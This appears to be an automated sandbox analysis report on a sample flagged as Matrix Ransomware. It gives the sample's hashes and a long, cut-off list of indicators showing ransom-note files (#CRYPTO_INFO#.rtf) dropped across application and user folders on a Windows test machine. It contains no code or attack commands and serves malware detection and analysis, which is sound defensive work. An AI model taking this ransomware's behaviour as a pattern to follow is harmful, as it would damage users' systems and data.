Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe
Resource
win10v200722
General
-
Target
8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe
-
Size
1.2MB
-
MD5
a3da27f0a896681f858b41a685a2a961
-
SHA1
79f36457605a92fa33e9c48502c362223823255c
-
SHA256
8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa
-
SHA512
65b63b1ec040319a3ba989a1b13b73a12d962f18c7ebf67c9a55787df4399dba2189a8c2a5a3acb59756cbc816b6b33fa63a570951b982cb47ffb7f580901ae3
Malware Config
Signatures
-
Matrix Ransomware 1812 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ca-Es-VALENCIA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7d6e6375-4c07-46a1-b3e8-f1b3289d96c6}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-US\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\HoloCamera_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Pictures\Camera Roll\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Oracle\Java\installcache_x64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{cf186260-34e3-4b3c-b5bf-ccf1f529fb30}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Contacts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created 